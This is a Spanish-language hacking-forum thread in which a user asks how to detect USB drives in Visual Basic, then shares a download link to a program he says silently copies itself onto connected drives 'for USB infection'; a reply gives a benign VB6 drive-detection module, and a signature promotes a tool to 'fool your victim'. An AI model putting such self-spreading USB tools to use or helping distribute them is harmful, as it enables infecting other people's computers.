elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Detectar pen drive o USB e infectar
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Detectar pen drive o USB e infectar  (Leído 12,227 veces)
drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Detectar pen drive o USB e infectar
« en: 17 Junio 2007, 21:01 pm »

hay alguna forma de detectar cuando la pen drive se conecta a la pc?
x ejemplo q me de una alerta o un mensaje la aplicacion cuando la pen drive o usb este conectada


« Última modificación: 18 Junio 2007, 18:03 pm por drakolive » En línea

zumbah

Desconectado Desconectado

Mensajes: 34


...asi, cayéndose...


Ver Perfil
Re: Detectar pen drive o USB
« Respuesta #1 en: 17 Junio 2007, 21:34 pm »

Segun, que windows utilizas tu? Si quieres que tambien se instale automaticamente necesitas Plug & Play (viene de serie desde la version 2000 creo..) Si no lo detecta es posible que te haya entrado alguna especia de virus y te lo haya desconfigurado para que no lo detecte.

Saludos espero haberte ayudado.


En línea



Excelente programa para extraer el icono de cualquier programa y engañar a tu victima! v2.0
http://rapidshare.com/files/37789681/XtraCT_iCoN.rar
drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Detectar pen drive o USB
« Respuesta #2 en: 17 Junio 2007, 23:17 pm »

para win XP..
me refieron en VB
como crear una function q detete si se conecto una usb... asi como lo hace ese globo del xp
En línea

Sancho.Mazorka


Desconectado Desconectado

Mensajes: 480


Gamer & Programador


Ver Perfil WWW
Re: Detectar pen drive o USB
« Respuesta #3 en: 18 Junio 2007, 07:22 am »

Ya se ha hablando muchas veces esto, usa el boton de BUSCAR que esta arriba, uno de estos post los respondio RedMx, hasta hizo un programa!


Sancho.Mazorka    :¬¬
En línea

Ganador Xeon Web Server ! ! !    Sancho.Mazorka :D
http://foro.elhacker.net/index.php/topic,171903.75.html


drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Detectar pen drive o USB
« Respuesta #4 en: 18 Junio 2007, 17:59 pm »

Ya hice lo q qria
http://rapidshare.com/files/37949048/USB_infect.zip
alli esta... por si algioemn qiere probarlo y verlo..
lo unico q hace es detectar si se desconecta o conecta un USB... si se conecta se copia en ella silenciosamente...
esto seria para usarlo cmo infeccion por usb.

PD: lo encontre por mi cuenta... en este foro no estaba algo como lo q tengo.
« Última modificación: 18 Junio 2007, 18:03 pm por drakolive » En línea

JmHk

Desconectado Desconectado

Mensajes: 36


San google EL MEJOR!!!!!!!


Ver Perfil
Re: Detectar pen drive o USB e infectar
« Respuesta #5 en: 18 Junio 2008, 01:43 am »

Public Declare Function GetVolumeInformation Lib "kernel32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long
Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Public Declare Function GetLogicalDrives Lib "kernel32" () As Long

'VARIABLE QUE VA A TOMAR EL MOMBRE DE LA UNIDAD
Public UnidadUSB As String

Public Function GetDriveSerial(ByVal sDrive As String) As Long
    sDrive = UCase(Left$(sDrive, 1)) & ":\"
    Call GetVolumeInformation(sDrive, vbNullString, 0, GetDriveSerial, 0, 0, vbNullString, 0)
    UnidadUSB = sDrive
End Function

Public Function IsConnected(ByVal lID As Long) As Boolean
    Dim LDs As Long, Cnt As Long, sDrives As String
    LDs = GetLogicalDrives
    For Cnt = 0 To 25
        If (LDs And 2 ^ Cnt) <> 0 Then
            sDrives = sDrives + Chr$(65 + Cnt)
            If GetDriveType(Trim(Right(sDrives, 1) & ":\")) = 2 Then
                UnidadUSB = Trim(Right(sDrives, 1) & ":\")
            End If
        End If
    Next Cnt
End Function


hay tienes un modulo para dectectar usb espero que te sirva, saludos
En línea

SKL (orignal)

Desconectado Desconectado

Mensajes: 259


UpLoadSourceCode


Ver Perfil WWW
Re: Detectar pen drive o USB e infectar
« Respuesta #6 en: 18 Junio 2008, 03:58 am »

ya se trato este tema en el foro, porque no buscas la palabra USB y vas a ver que sale bastante sobre esto...

con un simple hook podes detectarlo, hay varios proyectos en otro post que te puede servir
En línea

cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: Detectar pen drive o USB e infectar
« Respuesta #7 en: 18 Junio 2008, 04:09 am »

Por si no se han dado cuenta el último post de drakolive en este hilo se hizo hace ya 1 año exactamente y dijo que había conseguido lo que quería, solo están reviviendo post antiguos…
En línea

lion7712

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Detectar pen drive o USB
« Respuesta #8 en: 22 Octubre 2008, 20:08 pm »

Ya hice lo q qria
http://rapidshare.com/files/37949048/USB_infect.zip
alli esta... por si algioemn qiere probarlo y verlo..
lo unico q hace es detectar si se desconecta o conecta un USB... si se conecta se copia en ella silenciosamente...
esto seria para usarlo cmo infeccion por usb.

PD: lo encontre por mi cuenta... en este foro no estaba algo como lo q tengo.


No se si me puedas pasar este programa para detectar cuando se desconecte o conecte un usb espero me puedas apoyar gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines